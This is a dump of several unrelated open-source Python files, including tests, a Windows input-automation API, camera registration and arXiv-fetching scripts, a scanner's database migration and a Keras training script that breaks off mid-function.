y = functions.layer_normalization(x, gamma, beta, eps=self.eps)
return y,
testing.run_module(__name__, __file__)
|
tests/integration/test_indices.py
|
fduguet-nv/cunumeric
| 304 |
62373
|
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
import numpy as np
import pytest
import cunumeric as cn
from legate.core import LEGATE_MAX_DIM
@pytest.mark.parametrize("ndim", range(0, LEGATE_MAX_DIM))
def test_indices(ndim):
dimensions = tuple(random.randint(2, 5) for i in range(ndim))
np_res = np.indices(dimensions)
cn_res = cn.indices(dimensions)
assert np.array_equal(np_res, cn_res)
np_res = np.indices(dimensions, dtype=float)
cn_res = cn.indices(dimensions, dtype=float)
assert np.array_equal(np_res, cn_res)
np_res = np.indices(dimensions, sparse=True)
cn_res = cn.indices(dimensions, sparse=True)
for i in range(len(np_res)):
assert np.array_equal(np_res[i], cn_res[i])
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/pcDevice/windows/windowsDeviceAPI.py
|
Passer-D/GameAISDK
| 1,210 |
62389
|
<filename>tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/pcDevice/windows/windowsDeviceAPI.py<gh_stars>1000+
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import time
import traceback
import logging
import win32gui
from ..iPcDeviceAPI import IPcDeviceAPI
from .APIDefine import LOG_DEFAULT
from .win32driver.capture import get_image, roi
from .win32driver.keyboard import Keyboard
from .win32driver.mouse import Mouse, MouseClickType, MouseFlag
from .win32driver.probe import Win32Probe, set_foreground_window
from .win32driver.by import QPath
class WindowsDeviceAPI(IPcDeviceAPI):
def __init__(self, platform):
IPcDeviceAPI.__init__(self, platform)
self.__logger = logging.getLogger(LOG_DEFAULT)
self._is_desktop_window = False
self._hwnd = None
self._qpath = None
self._windows_size = None
self._kwargs = {}
def Initialize(self, **kwargs):
hwnd = kwargs.get('hwnd', None)
query_path = kwargs.get('query_path', None)
window_size = kwargs.get('window_size', None)
if not hwnd and query_path is None:
hwnd = win32gui.GetDesktopWindow()
self._is_desktop_window = True
if not hwnd and query_path:
# hwnd = 0xE019DC
hwnds = Win32Probe().search_element(QPath(query_path))
cnt = len(hwnds)
if cnt > 1:
raise Exception('found multi windows by qpath(%s)' % query_path)
elif cnt == 0:
raise Exception('failed to find window by qpath(%s)' % query_path)
hwnd = hwnds[0]
if isinstance(hwnd, str) and hwnd.isdigit():
hwnd = int(hwnd)
if not win32gui.IsWindow(hwnd):
raise ValueError('hwnd(%s) is not valid' % hwnd)
if window_size:
l, t, r, b = win32gui.GetWindowRect(hwnd)
w = r - l
h = b - t
if abs(w - window_size[0]) > 50 or abs(h - window_size[1]) > 50:
raise Exception('window size is not equal, real(%s) != %s' % (str([w, h]), str(window_size)))
top_hwnd = Win32Probe().get_property(hwnd, 'TOPLEVELWINDOW')
if top_hwnd:
set_foreground_window(top_hwnd)
self._hwnd = hwnd
self._qpath = query_path
self._kwargs = kwargs
self._windows_size = window_size
return True
@property
def window_handle(self):
return self._hwnd
def DeInitialize(self):
return True
def ScreenCap(self, subrect=None):
"""
:param subrect:
:return:
"""
try:
img_data = get_image(self._hwnd)
if img_data is not None and subrect:
img_data = roi(img_data, subrect)
return img_data
except Exception as e:
self.__logger.error('screencap error: %s', e)
raise e
def _to_screen_pos(self, client_pos):
""" 将相对于窗口的坐标转成屏幕坐标
:param client_pos:
:return:
"""
if self._is_desktop_window:
return client_pos
x, y = client_pos
rc = win32gui.GetWindowRect(self._hwnd)
pt = (x + rc[0], y + rc[1])
return pt
def PressKey(self, key):
Keyboard.press_key(key)
def ReleaseKey(self, key):
Keyboard.release_key(key)
def InputKeys(self, keys, long_click_time):
# self.keyboard.inputKeys(keys)
Keyboard.input_keys(keys)
if long_click_time > 0:
time.sleep(long_click_time/1000)
def InputStrings(self, key_string):
Keyboard.input_keys(key_string)
# self.keyboard.inputString(key_string)
def MouseMove(self, px, py):
sx, sy = self._to_screen_pos((px, py))
Mouse.move(sx, sy)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.move((percent_x, percent_y))
def MouseClick(self, px, py, by_post=False):
if by_post:
Mouse.post_click(self._hwnd, px, py)
else:
sx, sy = self._to_screen_pos((px, py))
Mouse.click(sx, sy)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.click((percent_x, percent_y))
def MouseDoubleClick(self, px, py):
sx, sy = self._to_screen_pos((px, py))
Mouse.click(sx, sy, click_type=MouseClickType.DoubleClick)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.doubleclick((percent_x, percent_y))
def MouseRightClick(self, px, py):
sx, sy = self._to_screen_pos((px, py))
Mouse.click(sx, sy, MouseFlag.RightButton)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.rightclick((percent_x, percent_y))
def MouseLongClick(self, px, py, long_click_time):
"""
:param px:
:param py:
        :param long_click_time: long-press duration, in milliseconds
:return:
"""
sx, sy = self._to_screen_pos((px, py))
Mouse.click(sx, sy)
time.sleep(long_click_time/1000)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.longclick(long_click_time / 1000, (percent_x, percent_y))
def MouseDrag(self, from_x, from_y, to_x, to_y):
""" 从起点(from_x, from_y)拖动到(to_x, to_y)
:param from_x:
:param from_y:
:param to_x:
:param to_y:
:return:
"""
sfx, sfy = self._to_screen_pos((from_x, from_y))
stx, sty = self._to_screen_pos((to_x, to_y))
Mouse.drag(sfx, sfy, stx, sty)
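# A hypothetical usage sketch (illustrative only; the window handle below is
# made up and must refer to a real window on the local machine):
#
#     api = WindowsDeviceAPI("windows")
#     api.Initialize(hwnd=0x000A0B2C)   # or query_path=..., window_size=...
#     image = api.ScreenCap()
#     api.MouseClick(100, 200)
#     api.DeInitialize()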
|
examples/calibration_registration/register.py
|
seanyen/Azure-Kinect-Sensor-SDK
| 1,120 |
62400
|
"""
An app script to run registration between two cameras from the command line.
Copyright (C) Microsoft Corporation. All rights reserved.
"""
# Standard Libraries.
import argparse
# Calibration tools.
from camera_tools import register
# ------------------------------------------------------------------------------
def parse_args():
"""
Get arguments for running the registration.
Returns:
        args -- Parsed command line arguments for running registration.
"""
parser = argparse.ArgumentParser(description="Get extrinsics for cameras.")
parser.add_argument("-ia", "--img-a", required=True,
help="Full path to image from camera A.")
parser.add_argument("-ib", "--img-b", required=True,
help="Full path to image from camera B.")
parser.add_argument("-t", "--template", required=True,
help="Full path to Charuco board template file.")
parser.add_argument("-ca", "--calib-a", required=True,
help="Full path to calibration file from camera A.")
parser.add_argument("-cb", "--calib-b", required=True,
help="Full path to calibration file from camera B.")
parser.add_argument("-o", "--out-dir", required=True,
help="Output directory for full calibration blob.")
cmd_args = parser.parse_args()
return cmd_args
if __name__ == "__main__":
args = parse_args()
rotation, translation, rms1_pixels, rms1_rad, rms2_pixels, rms2_rad = \
register(args.img_a,
args.img_b,
args.template,
args.calib_a,
args.calib_b,
args.out_dir)
|
VulnerableScan/migrations/0004_remove_exploitregister_file_object_and_more.py
|
b0bac/ApolloScanner
| 289 |
62433
|
# Generated by Django 4.0.1 on 2022-03-10 17:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Assets', '0003_alter_assetlist_timestamp_alter_assettask_timestamp'),
('VulnerableScan', '0003_alter_exploitregister_timestamp_and_more'),
]
operations = [
migrations.RemoveField(
model_name='exploitregister',
name='file_object',
),
migrations.AddField(
model_name='exploitregister',
name='code',
field=models.TextField(db_column='code', null=True, verbose_name='负载代码'),
),
migrations.AddField(
model_name='exploitregister',
name='debug_info',
field=models.TextField(blank=True, db_column='debug_info', default='', null=True, verbose_name='调试信息'),
),
migrations.AddField(
model_name='exploitregister',
name='function_name',
field=models.CharField(db_column='function_name', default='', max_length=100, verbose_name='函数名称'),
),
migrations.AddField(
model_name='exploitregister',
name='target',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标'),
),
migrations.AlterField(
model_name='exploitregister',
name='description',
field=models.TextField(db_column='description', verbose_name='负载描述'),
),
]
|
tests/framework/CodeInterfaceTests/RAVEN/ReturnDatabase/innerRunDir/nd_data.py
|
rinelson456/raven
| 159 |
62469
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
def run(raven, inputs):
"""
Run method.
@ In, raven, object, RAVEN object
@ In, inputs, dict, input dictionary
@ Out, None
"""
# inputs: a, b, c
# outputs: d, e, f
# indices: d(), e(x), f(x, y)
a = raven.a
b = raven.b
c = raven.c
nx = 5
ny = 3
x = np.arange(nx) * 0.1
y = np.arange(ny) * 10
d = a*a
e = x * b
f = np.arange(nx*ny).reshape(nx, ny) * c
# save
raven.x = x
raven.y = y
raven.d = d
raven.e = e
raven.f = f
raven._indexMap = {'e': ['x'],
'f': ['x', 'y']
}
|
db_bascline.py
|
wstart/DB_BaseLine
| 152 |
62546
|
<reponame>wstart/DB_BaseLine
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
from script.mysql_baseline import *
from loghandle import *
import getopt
if __name__ == "__main__":
bannber = '''
____ ____ ____ _ _ {''' + db_baseline_basic.getVersion() + '''}
| _ \| __ )| __ ) __ _ ___ ___| (_)_ __ ___
| | | | _ \| _ \ / _` / __|/ _ \ | | '_ \ / _ \\
| |_| | |_) | |_) | (_| \__ \ __/ | | | | | __/
|____/|____/|____/ \__,_|___/\___|_|_|_| |_|\___|
(https://github.com/wstart/DB_BaseLine)
--------------------------------------------------'''
supperdb = ["mysql"]
DBnames = ",".join(supperdb)
small_helper='''
Usage: python db_baseline.py [options]
    python db_baseline.py -h for more information
'''
helper = '''
Usage: python db_baseline.py [options]
[Options]:
-v ,--version show version
-h,--help show help
-D,--database check DataBase type,default is mysql
support Database list: ''' + DBnames + '''
-H,--host host,Default:127.0.0.1
if host is not 127.0.0.1 or localhost only check command
-P,--database-port database port,Default:Database Default port
it will set by check script
-u,--database-user database rootuser,default:root
-p,--database-password database password,default:root
'''
plog = loghandle.getLogEntity()
    plog.output(banner, "INFO", showtime=False, showlevel=False)
runconfig = {
"database": "",
"host": "",
"database_port": "",
"database_user": "",
"database_password": ""
}
try:
opts, args = getopt.getopt(sys.argv[1:], "vhD:H:P:u:p:",
["version", "help", "database=", "host=", "database-port=", "database-user=",
"database-password="])
checkscript = ""
if len(opts) == 0:
print small_helper
exit()
for o, a in opts:
if o in ("-v", "--version"):
print("DB_BASELINE : " + db_baseline_basic.getVersion())
sys.exit()
elif o in ("-h", "--help"):
print helper
sys.exit()
elif o in ("-D", "--database"):
runconfig["database"] = a
elif o in ("-H", "--host"):
runconfig["host"] = a
elif o in ("-P", "--database-port"):
runconfig["database_port"] = a
elif o in ("-U", "--database-user"):
runconfig["database_user"] = a
elif o in ("-p", "--database-password"):
runconfig["database_password"] = a
if runconfig["database"] == "mysql":
checkscript = mysql_baseline(runconfig)
if checkscript != "":
result = checkscript.runtest()
else:
plog.output("No match DataBase Type","ERROR")
print small_helper
plog.output("DBBaseline exit()")
except getopt.GetoptError:
print helper
|
data-processing/scripts/fetch_arxiv_sources.py
|
hhchi13/scholarphi
| 285 |
62553
|
<filename>data-processing/scripts/fetch_arxiv_sources.py
import argparse
import os
from common import directories
from common.fetch_arxiv import fetch_from_arxiv
from common.unpack import unpack, unpack_archive
if __name__ == "__main__":
parser = argparse.ArgumentParser(
"Fetch and unpack sources for a single arXiv paper."
)
parser.add_argument(
"arxiv_id",
help="The arXiv ID for a paper. May include version number (i.e., 'v1', 'v2', etc.)",
)
parser.add_argument(
"--output-dir",
help=(
"Directory into which the arXiv sources will be fetched. The fetched sources will "
+ "be saved in a subfolder of the output folder with its name as the arXiv ID "
+ "(i.e., 'output_dir/<arxiv_id>/')."
),
default="tmp",
)
args = parser.parse_args()
arxiv_id = args.arxiv_id
output_dir = args.output_dir
archives_dir = os.path.join(output_dir, "archives")
archive_path = os.path.join(archives_dir, directories.escape_slashes(arxiv_id))
sources_dir = os.path.join(output_dir, directories.escape_slashes(arxiv_id))
if not os.path.exists(archives_dir):
print(f"Creating directory to hold source archives at {archives_dir}.")
os.makedirs(archives_dir)
print(
f"Downloading archive of source files from arXiv for paper {arxiv_id}...",
end="",
)
fetch_from_arxiv(arxiv_id, dest=archive_path)
print("done.")
if not os.path.exists(sources_dir):
print(f"Creating directory to hold unpacked sources at {sources_dir}.")
os.makedirs(sources_dir)
print(f"Unpacking sources for paper {arxiv_id} into {sources_dir}.")
unpack_archive(archive_path, sources_dir)
|
src/gfl/shell/shell.py
|
mingt2019/GFL
| 123 |
62578
|
<gh_stars>100-1000
import os
import sys
import requests
from gfl.conf import GflConf
class Shell(object):
__host = "127.0.0.1"
__port = 9434
@classmethod
def welcome(cls, **kwargs):
print("------- GFL -------")
print("%-20s:%s" % ("pid", str(os.getpid())))
@classmethod
def attach(cls, host, port):
cls.welcome()
cls.startup(host=host, port=port)
pass
@classmethod
def startup(cls, **kwargs):
cls.__host = kwargs.pop("host", "127.0.0.1")
cls.__port = kwargs.pop("port", GflConf.get_property("api.http.port"))
while True:
cmd = input("> ")
if "EXIT".lower() == cmd.lower():
cls.exit()
break
if cmd.startswith("SHOWCONF"):
key = cmd[9:].strip()
print(GflConf.get_property(key))
@classmethod
def exit(cls, **kwargs):
req_url = "http://%s:%s/shutdown" % (cls.__host, cls.__port)
resp = requests.post(req_url)
try:
data = resp.json()
if data["code"] == 0:
return True
else:
return False
        except Exception:
return False
|
tests/ignite/distributed/utils/test_serial.py
|
Juddd/ignite
| 4,119 |
62607
|
import torch
import ignite.distributed as idist
from tests.ignite.distributed.utils import (
_sanity_check,
_test_distrib__get_max_length,
_test_distrib_all_gather,
_test_distrib_all_reduce,
_test_distrib_barrier,
_test_distrib_broadcast,
_test_sync,
)
def test_no_distrib(capsys):
assert idist.backend() is None
if torch.cuda.is_available():
assert idist.device().type == "cuda"
else:
assert idist.device().type == "cpu"
assert idist.get_rank() == 0
assert idist.get_world_size() == 1
assert idist.get_local_rank() == 0
assert idist.model_name() == "serial"
from ignite.distributed.utils import _model, _SerialModel
_sanity_check()
assert isinstance(_model, _SerialModel)
idist.show_config()
captured = capsys.readouterr()
out = captured.err.split("\r")
out = list(map(lambda x: x.strip(), out))
out = list(filter(None, out))
assert "ignite.distributed.utils INFO: distributed configuration: serial" in out[-1]
assert "ignite.distributed.utils INFO: backend: None" in out[-1]
if torch.cuda.is_available():
assert "ignite.distributed.utils INFO: device: cuda" in out[-1]
else:
assert "ignite.distributed.utils INFO: device: cpu" in out[-1]
assert "ignite.distributed.utils INFO: rank: 0" in out[-1]
assert "ignite.distributed.utils INFO: local rank: 0" in out[-1]
assert "ignite.distributed.utils INFO: world size: 1" in out[-1]
def test_sync_no_dist():
from ignite.distributed.comp_models import _SerialModel
_test_sync(_SerialModel)
def test_idist_methods_no_dist():
assert idist.get_world_size() < 2
assert idist.backend() is None, f"{idist.backend()}"
def test_idist__model_methods_no_dist():
_test_distrib__get_max_length("cpu")
if torch.cuda.device_count() > 1:
_test_distrib__get_max_length("cuda")
def test_idist_collective_ops_no_dist():
_test_distrib_all_reduce("cpu")
_test_distrib_all_gather("cpu")
_test_distrib_barrier("cpu")
_test_distrib_broadcast("cpu")
if torch.cuda.device_count() > 1:
_test_distrib_all_reduce("cuda")
_test_distrib_all_gather("cuda")
_test_distrib_barrier("cuda")
_test_distrib_broadcast("cuda")
|
src/train.py
|
anirbanlahiri2017/Tartarus
| 104 |
62624
|
from __future__ import print_function
import argparse
from collections import OrderedDict
import json
import os
import logging
from keras.callbacks import EarlyStopping
from sklearn.preprocessing import normalize
from sklearn.metrics import roc_curve, auc, roc_auc_score, precision_score, recall_score, f1_score, accuracy_score, average_precision_score
from scipy.sparse import csr_matrix
from keras.utils.io_utils import HDF5Matrix
#from keras.utils.visualize_util import plot
from keras.optimizers import SGD, Adam
from sklearn.metrics import r2_score
import numpy as np
import theano.tensor as tt
import pandas as pd
import random
import common
import models
from predict import obtain_predictions
from eval import do_eval
import h5py
class Config(object):
"""Configuration for the training process."""
def __init__(self, params, normalize=False, whiten=True):
self.model_id = common.get_next_model_id()
self.norm = normalize
self.whiten = whiten
self.x_path = '%s_%sx%s' % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
self.y_path = '%s_%s_%s' % (params['dataset']['fact'],params['dataset']['dim'],params['dataset']['dataset'])
self.dataset_settings = params['dataset']
self.training_params = params['training']
self.model_arch = params['cnn']
self.predicting_params = params['predicting']
def get_dict(self):
object_dict = self.__dict__
first_key = "model_id"
conf_dict = OrderedDict({first_key: object_dict[first_key]})
conf_dict.update(object_dict)
return conf_dict
def _squared_magnitude(x):
return tt.sqr(x).sum(axis=-1)
def _magnitude(x):
return tt.sqrt(tt.maximum(_squared_magnitude(x), np.finfo(x.dtype).tiny))
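# Cosine distance scaled to [0, 1]: (1 - cosine similarity) / 2, clipped for numerical safety.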
def cosine(x, y):
return tt.clip((1 - (x * y).sum(axis=-1) /
(_magnitude(x) * _magnitude(y))) / 2, 0, 1)
def load_sparse_csr(filename):
loader = np.load(filename)
return csr_matrix(( loader['data'], loader['indices'], loader['indptr']),
shape = loader['shape'])
def build_model(config):
"""Builds the cnn."""
params = config.model_arch
get_model = getattr(models, 'get_model_'+str(params['architecture']))
model = get_model(params)
#model = model_kenun.build_convnet_model(params)
# Learning setup
t_params = config.training_params
sgd = SGD(lr=t_params["learning_rate"], decay=t_params["decay"],
momentum=t_params["momentum"], nesterov=t_params["nesterov"])
adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
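    # The training config names the optimizer as a string ('sgd' or 'adam'); eval resolves it to one of the objects built above.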
optimizer = eval(t_params['optimizer'])
metrics = ['mean_squared_error']
if config.model_arch["final_activation"] == 'softmax':
metrics.append('categorical_accuracy')
if t_params['loss_func'] == 'cosine':
loss_func = eval(t_params['loss_func'])
else:
loss_func = t_params['loss_func']
model.compile(loss=loss_func, optimizer=optimizer,metrics=metrics)
return model
def load_data_preprocesed(params, X_path, Y_path, dataset, val_percent, test_percent, n_samples, with_metadata=False, only_metadata=False, metadata_source='rovi'):
    factors = np.load(common.DATASETS_DIR+'/y_train_'+Y_path+'.npy') # NOTE: remove S
index_factors = open(common.DATASETS_DIR+'/items_index_train_'+dataset+'.tsv').read().splitlines()
if not only_metadata:
all_X = np.load(common.TRAINDATA_DIR+'/X_train_'+X_path+'.npy')
index_train = open(common.TRAINDATA_DIR+'/index_train_%s.tsv' % (X_path)).read().splitlines()
all_Y = np.zeros((len(index_train),factors.shape[1]))
index_factors_inv = dict()
for i,item in enumerate(index_factors):
index_factors_inv[item] = i
for i,item in enumerate(index_train):
all_Y[i,:] = factors[index_factors_inv[item]]
else:
all_Y = factors
if with_metadata:
if 'w2v' in metadata_source:
all_X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,dataset))[:,:int(params['cnn']['sequence_length'])]
elif 'model' in metadata_source or not params['dataset']['sparse']:
all_X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,dataset))
else:
all_X_meta = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (metadata_source,dataset)).todense()
all_X_in_meta = all_X = all_X_meta
print(all_X.shape)
print(all_Y.shape)
if n_samples != 'all':
n_samples = int(n_samples)
all_X = all_X[:n_samples]
all_Y = all_Y[:n_samples]
if with_metadata:
all_X_in_meta = all_X_in_meta[:n_samples]
if params['training']['normalize_y'] == True:
normalize(all_Y,copy=False)
if params['training']["val_from_file"]:
Y_val = np.load(common.DATASETS_DIR+'/y_val_'+Y_path+'.npy')
        Y_test = np.load(common.DATASETS_DIR+'/y_test_'+Y_path+'.npy') #!!! NOTE: remove S from trainS
if params['dataset']['sparse']:
X_val = load_sparse_csr(common.TRAINDATA_DIR+'/X_val_%s_%s.npz' % (metadata_source,dataset)).todense()
X_test = load_sparse_csr(common.TRAINDATA_DIR+'/X_test_%s_%s.npz' % (metadata_source,dataset)).todense()
else:
X_val = np.load(common.TRAINDATA_DIR+'/X_val_%s_%s.npy' % (metadata_source,dataset))
X_test = np.load(common.TRAINDATA_DIR+'/X_test_%s_%s.npy' % (metadata_source,dataset))
X_train = all_X
Y_train = all_Y
else:
N = all_Y.shape[0]
train_percent = 1 - val_percent - test_percent
N_train = int(train_percent * N)
N_val = int(val_percent * N)
logging.debug("Training data points: %d" % N_train)
logging.debug("Validation data points: %d" % N_val)
logging.debug("Test data points: %d" % (N - N_train - N_val))
if not only_metadata:
# Slice data
X_train = all_X[:N_train]
X_val = all_X[N_train:N_train + N_val]
X_test = all_X[N_train + N_val:]
Y_train = all_Y[:N_train]
Y_val = all_Y[N_train:N_train + N_val]
Y_test = all_Y[N_train + N_val:]
if with_metadata:
if only_metadata:
X_train = all_X_in_meta[:N_train]
X_val = all_X_in_meta[N_train:N_train + N_val]
X_test = all_X_in_meta[N_train + N_val:]
else:
X_train = [X_train,all_X_in_meta[:N_train]]
X_val = [X_val,all_X_in_meta[N_train:N_train + N_val]]
X_test = [X_test,all_X_in_meta[N_train + N_val:]]
return X_train, Y_train, X_val, Y_val, X_test, Y_test
def load_data_hf5(params,val_percent, test_percent):
hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%s.hdf5" % (params['dataset']['dataset'],params['dataset']['window'])
f = h5py.File(hdf5_file,"r")
N = f["targets"].shape[0]
f.close()
train_percent = 1 - val_percent - test_percent
N_train = int(train_percent * N)
N_val = int(val_percent * N)
X_train = HDF5Matrix(hdf5_file, 'features', start=0, end=N_train)
Y_train = HDF5Matrix(hdf5_file, 'targets', start=0, end=N_train)
X_val = HDF5Matrix(hdf5_file, 'features', start=N_train, end=N_train+N_val)
Y_val = HDF5Matrix(hdf5_file, 'targets', start=N_train, end=N_train+N_val)
X_test = HDF5Matrix(hdf5_file, 'features', start=N_train+N_val, end=N)
Y_test = HDF5Matrix(hdf5_file, 'targets', start=N_train+N_val, end=N)
return X_train, Y_train, X_val, Y_val, X_test, Y_test, N_train
def load_data_hf5_memory(params,val_percent, test_percent, y_path, id2gt, X_meta = None, val_from_file = False):
if val_from_file:
hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f = h5py.File(hdf5_file,"r")
index_train = f["index"][:]
index_train = np.delete(index_train, np.where(index_train == ""))
N_train = index_train.shape[0]
val_hdf5_file = common.PATCHES_DIR+"/patches_val_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f_val = h5py.File(val_hdf5_file,"r")
X_val = f_val['features'][:]
#Y_val = f_val['targets'][:]
factors_val = np.load(common.DATASETS_DIR+'/y_val_'+y_path+'.npy')
index_factors_val = open(common.DATASETS_DIR+'/items_index_val_'+params['dataset']['dataset']+'.tsv').read().splitlines()
id2gt_val = dict((index,factor) for (index,factor) in zip(index_factors_val,factors_val))
index_val = [i for i in f_val['index'][:] if i in id2gt_val]
X_val = np.delete(X_val, np.where(index_val == ""), axis=0)
index_val = np.delete(index_val, np.where(index_val == ""))
Y_val = np.asarray([id2gt_val[id] for id in index_val])
test_hdf5_file = common.PATCHES_DIR+"/patches_test_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f_test = h5py.File(test_hdf5_file,"r")
X_test = f_test['features'][:]
#Y_test = f_test['targets'][:]
factors_test = np.load(common.DATASETS_DIR+'/y_test_'+y_path+'.npy')
index_factors_test = open(common.DATASETS_DIR+'/items_index_test_'+params['dataset']['dataset']+'.tsv').read().splitlines()
id2gt_test = dict((index,factor) for (index,factor) in zip(index_factors_test,factors_test))
index_test = [i for i in f_test['index'][:] if i in id2gt_test]
X_test = np.delete(X_test, np.where(index_test == ""), axis=0)
index_test = np.delete(index_test, np.where(index_test == ""))
Y_test = np.asarray([id2gt_test[id] for id in index_test])
else:
hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f = h5py.File(hdf5_file,"r")
index_all = f["index"][:]
N = index_all.shape[0]
train_percent = 1 - val_percent - test_percent
N_train = int(train_percent * N)
N_val = int(val_percent * N)
X_val = f['features'][N_train:N_train+N_val]
index_val = f['index'][N_train:N_train+N_val]
X_val = np.delete(X_val, np.where(index_val == ""), axis=0)
index_val = np.delete(index_val, np.where(index_val == ""))
Y_val = np.asarray([id2gt[id] for id in index_val])
X_test = f['features'][N_train+N_val:N]
index_test = f['index'][N_train+N_val:N]
print(index_test.shape)
print(X_test.shape)
X_test = np.delete(X_test, np.where(index_test == ""), axis=0)
index_test = np.delete(index_test, np.where(index_test == ""))
print(index_test.shape)
print(X_test.shape)
Y_test = np.asarray([id2gt[id] for id in index_test])
print(Y_test.shape)
index_train = f['index'][:N_train]
index_train = np.delete(index_train, np.where(index_train == ""))
N_train = index_train.shape[0]
    if X_meta is not None:
X_val = [X_val,X_meta[N_train:N_train+N_val]]
X_test = [X_test,X_meta[N_train+N_val:N]]
return X_val, Y_val, X_test, Y_test, N_train
def batch_block_generator(params, y_path, N_train, id2gt, X_meta=None,
val_from_file=False):
hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f = h5py.File(hdf5_file,"r")
block_step = 50000
batch_size = params['training']['n_minibatch']
randomize = True
with_meta = False
    if X_meta is not None:
with_meta = True
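    # Stream the HDF5 training patches in blocks of 50k rows to keep memory bounded; each block is shuffled and yielded as minibatches.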
while 1:
for i in range(0, N_train, block_step):
x_block = f['features'][i:min(N_train, i+block_step)]
index_block = f['index'][i:min(N_train, i+block_step)]
#y_block = f['targets'][i:min(N_train,i+block_step)]
x_block = np.delete(x_block, np.where(index_block == ""), axis=0)
index_block = np.delete(index_block, np.where(index_block == ""))
y_block = np.asarray([id2gt[id] for id in index_block])
if params['training']['normalize_y']:
normalize(y_block, copy=False)
items_list = range(x_block.shape[0])
if randomize:
random.shuffle(items_list)
for j in range(0, len(items_list), batch_size):
if j+batch_size <= x_block.shape[0]:
items_in_batch = items_list[j:j+batch_size]
x_batch = x_block[items_in_batch]
y_batch = y_block[items_in_batch]
if with_meta:
x_batch = [x_batch, X_meta[items_in_batch]]
yield (x_batch, y_batch)
def process(params,with_predict=True,with_eval=True):
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
params['cnn']['n_out'] = int(params['dataset']['dim'])
#params['cnn']['n_frames'] = int(params['dataset']['window'] * SR / float(HR))
with_metadata = params['dataset']['with_metadata']
only_metadata = params['dataset']['only_metadata']
metadata_source = params['dataset']['meta-suffix']
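    # Load the optional metadata feature matrices; depending on the source they are truncated w2v sequences, dense .npy arrays, or sparse CSR .npz matrices.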
if with_metadata:
if 'w2v' in metadata_source:
X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,params['dataset']['dataset']))[:,:int(params['cnn']['sequence_length'])]
params['cnn']['n_metafeatures'] = len(X_meta[0])
if 'meta-suffix2' in params['dataset']:
X_meta2 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix2'],params['dataset']['dataset']))
params['cnn']['n_metafeatures2'] = len(X_meta2[0])
if 'meta-suffix3' in params['dataset']:
X_meta3 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix3'],params['dataset']['dataset']))
params['cnn']['n_metafeatures3'] = len(X_meta3[0])
if 'meta-suffix4' in params['dataset']:
X_meta4 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix4'],params['dataset']['dataset']))
params['cnn']['n_metafeatures4'] = len(X_meta4[0])
elif 'model' in metadata_source or not params['dataset']['sparse']:
X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,params['dataset']['dataset']))
params['cnn']['n_metafeatures'] = len(X_meta[0])
if 'meta-suffix2' in params['dataset']:
X_meta2 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix2'],params['dataset']['dataset']))
params['cnn']['n_metafeatures2'] = len(X_meta2[0])
if 'meta-suffix3' in params['dataset']:
X_meta3 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix3'],params['dataset']['dataset']))
params['cnn']['n_metafeatures3'] = len(X_meta3[0])
if 'meta-suffix4' in params['dataset']:
